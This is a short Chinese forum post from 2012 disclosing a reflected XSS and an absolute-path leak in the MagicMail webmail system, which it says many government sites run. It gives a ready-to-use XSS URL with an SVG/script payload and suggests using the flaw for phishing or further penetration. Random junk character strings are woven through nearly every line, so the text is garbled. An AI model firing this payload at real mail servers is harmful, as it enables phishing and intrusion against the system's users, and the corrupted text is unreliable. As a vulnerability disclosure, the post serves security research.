今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
% q1 A3 C5 X# ^8 F# a" g
# G- s- u6 ^0 D- b
8 o2 S) C: L$ k5 b- J) a+ m包含 一个反射性XSS 以及 绝对路径泄漏
* T# f5 W; x5 K! x7 D/ B看了看 貌似全部是linux的。
7 L& J5 `- W: {1 m; E; k 4 P8 H( o3 \; I* b+ [2 W
关键字:迈捷邮件系统 by MagicMail9 i4 b- K1 Q* E6 ~3 i8 W7 \; {$ Y
$ d7 P# |+ E# B7 n/ X' s: x1 r
可以看到很多政府网站都用这个邮件系统
7 V+ s. a, K" a9 R! u: N
( j5 g. Z' X _) H D绝对路径 http://madman.in/index.php?login_type=declare&language=1 N) N+ y! @+ R; p9 I5 n
' F. a% ~, Q1 y/ T+ W6 [
1 l/ \/ s0 @1 ~/ b! W4 `+ n2 ^ X5 |9 z) F* L
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E/ D7 K, Y% | c/ G
~$ A" a% ?4 s- I! b @" z% V, ~' i; [& s- c
% j8 Q/ Q9 S7 Q* z
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等9 G: m1 R5 E6 \. B; Q" v: y" Q% W2 M
- K9 @8 L) ~- ]: W# Q9 w
修复方案:看官方补丁吧。; m! e1 N" U9 @
|
发表于 2012-11-9 20:38:41
收藏
支持
反对